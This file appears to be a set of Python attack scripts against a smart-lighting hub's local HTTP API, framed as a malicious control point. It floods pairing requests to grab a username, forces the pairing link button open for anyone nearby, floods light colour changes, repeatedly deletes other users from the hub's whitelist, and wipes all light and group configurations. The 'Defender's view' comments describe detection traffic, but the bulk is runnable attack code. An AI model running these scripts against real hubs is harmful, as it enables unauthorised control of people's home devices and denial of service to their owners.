This script represents a malicious CP which spams authentication requests until the benign user presses the physical button on the hub.
# Pairing-request flood against the hub's local HTTP API.
# The script re-sends the same registration POST until one reply contains a
# "username", i.e. until a request happens to arrive while pairing is open.
# Defender's view: nothing here waits between attempts, so on the hub side
# this is a long run of identical unauthenticated POSTs to /api from a single
# LAN host, sent over plain HTTP.
import requests
import json

url = 'http://192.168.0.100/api'  # hub endpoint that receives pairing requests
post_fields = {"devicetype":"blabla"}  # body of the pairing request
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

# Up to 9999 attempts, numbered from 1 as in the printed counter.
for attempt in range(1, 10000):
    print('Waiting for the owner click on link button...')
    reply = requests.post(url, json=post_fields, headers=headers).json()
    if 'username' not in str(reply):
        # No credential in this reply: try again immediately.
        continue
    # The hub issued a username; print it and stop.
    print(attempt, reply)
    for entry in reply:
        print('\n........your userID is '+entry.get('success').get('username'))
        print('\n\n.........Attacker got a user name!!!!!!!!!!!!!!!')
    break

# Here, a malicious CP which has already authenticated with the hub sends
# "LinkButtonTrue" requests to the hub. Hence, anyone in the neighborhood can
# successfully get authenticated with the hub without requiring the user to
# press the physical button on the hub.
# Link-button override by an already whitelisted client.
# The script polls the hub state and, each time `linkbutton` reads False,
# writes it back to True through the config resource.
# Defender's view: the only credential is the username embedded in the URL
# path, and it travels over plain HTTP. The loop has an effect only if the hub
# accepts a `linkbutton` write from an API client (confirm against the firmware
# under test); on the wire it is a GET of the full state followed by a PUT to
# .../config, repeated from the same host.
import requests
import json

attackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'
url = 'http://192.168.0.100/api/'+attackerID+'/'  # base URL, also used for the state GET
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

put_fields = {'linkbutton':True}  # body of the config PUT
attack_4_url = url+'config'

# 999 polling rounds; the counter runs 2..1000, matching the printed value.
for i in range(2, 1001):
    hub_state = requests.get(url,headers=headers).json()
    link_open = hub_state.get('config').get('linkbutton')
    if link_open == False:
        print('linkbutton status: '+ str(link_open))
        requests.put(attack_4_url, json=put_fields,headers=headers).json()
        print('Sending linkbutton True request... to update the status of the hub '+ str(i))

# The malicious CP which got access to the system manipulates the smart device,
# such that the smart device becomes uncontrollable to the benign user.
# Light-state flooding by a whitelisted client.
# For every light the hub reports as reachable, the script sends 999 PUTs to
# that light's state resource, each with a random even `hue` value.
# Defender's view: the traffic is a dense series of PUTs to
# .../lights/<id>/state from one host, authorised only by the username in the
# URL path; the script itself never pauses between requests.
import requests
import json
import time
import random

attackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'
url = 'http://192.168.0.100/api/'+attackerID+'/'  # base URL, also used for the state GET
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

# One snapshot of the hub state; reachability is judged from this snapshot only.
requestData = requests.get(url,headers=headers).json()

lights = requestData.get('lights')
for key, light in lights.items():
    if light.get('state').get('reachable')==True:
        attack_2_url = url+'lights/'+key+'/state'
        for _ in range(999):
            colorChangedResponse = requests.put(
                attack_2_url,
                json={'hue':random.randrange(12000,66000,2)},
                headers=headers,
            ).json()

# The malicious CP further deletes all the whitelisted userIDs that are stored
# in the hub, including any new userID added. Hence, a denial-of-service occurs
# at the hub.
# Whitelist wipe by a whitelisted client.
# Phase 1 reads the hub's whitelist once and deletes every entry except the
# script's own username. Phase 2, after a 20 second pause, re-reads the
# whitelist 999 times and deletes whatever other entries have appeared.
# Defender's view: the activity is a series of DELETEs on
# .../config/whitelist/<id> issued by one whitelisted username, repeated after
# each state GET. A legitimate user who re-pairs is presumably removed again on
# the next round (confirm against the hub under test).
import requests
import json
import time

attackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'
url = 'http://192.168.0.100/api/'+attackerID+'/'  # base URL, also used for the state GET
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

requestData = requests.get(url,headers=headers).json()

# Phase 1: remove every whitelist entry present in the first snapshot.
userIDset = requestData.get('config').get('whitelist').keys()
print(len(userIDset))
for key in userIDset:
    # The length is that of the local snapshot, so it does not shrink as
    # entries are deleted on the hub.
    if key == attackerID or len(userIDset) <= 1:
        print('only attackerID is remaining = '+key)
        continue
    attack_1_url = url+'config/whitelist/'+key
    deleteResponse = requests.delete(attack_1_url,headers=headers).json()
    for item in deleteResponse:
        print('Deleting UserIDs...'+item.get('success'))

time.sleep(20)
print('Heads up...')

# Phase 2: keep removing entries that were added since (999 rounds).
for _ in range(999):
    newDataRequest = requests.get(url,headers=headers).json()
    userIDset = newDataRequest.get('config').get('whitelist').keys()
    for key in userIDset:
        if key == attackerID or len(userIDset) <= 1:
            print('only attackerID is remaining = '+key)
            continue
        attack_1_url = url+'config/whitelist/'+key
        deleteResponse = requests.delete(attack_1_url,headers=headers).json()
        print(deleteResponse)

# The malicious CP deletes all the smart devices configurations at the hub.
# Hence, a denial-of-service occurs at the smart device.
# Device-configuration wipe by a whitelisted client.
# From a single snapshot of the hub state, the script deletes every light
# entry, pauses 20 seconds, then deletes every group entry.
# Defender's view: the activity is a sweep of DELETEs over .../lights/<id> and
# then .../groups/<id> from one whitelisted username, sent over plain HTTP.
import requests
import json
import time

attackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'
url = 'http://192.168.0.100/api/'+attackerID+'/'  # base URL, also used for the state GET
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

# Both sweeps work from this one snapshot; the state is not fetched again.
requestData = requests.get(url,headers=headers).json()

# Sweep 1: lights.
lightIDsET = requestData.get('lights').keys()
for light_id in lightIDsET:
    attack_2_url = url+'lights/'+light_id
    deleteLightResponse = requests.delete(attack_2_url,headers=headers).json()
    for item in deleteLightResponse:
        print('Deleting Lights...'+item.get('success'))

time.sleep(20)
print('Heads up...')

# Sweep 2: groups saved on the hub.
groupIDsET = requestData.get('groups').keys()
for group_id in groupIDsET:
    attack_3_url = url+'groups/'+group_id
    deleteGroupsResponse = requests.delete(attack_3_url,headers=headers).json()
    for item in deleteGroupsResponse:
        print('Deleting Groups...'+item.get('success'))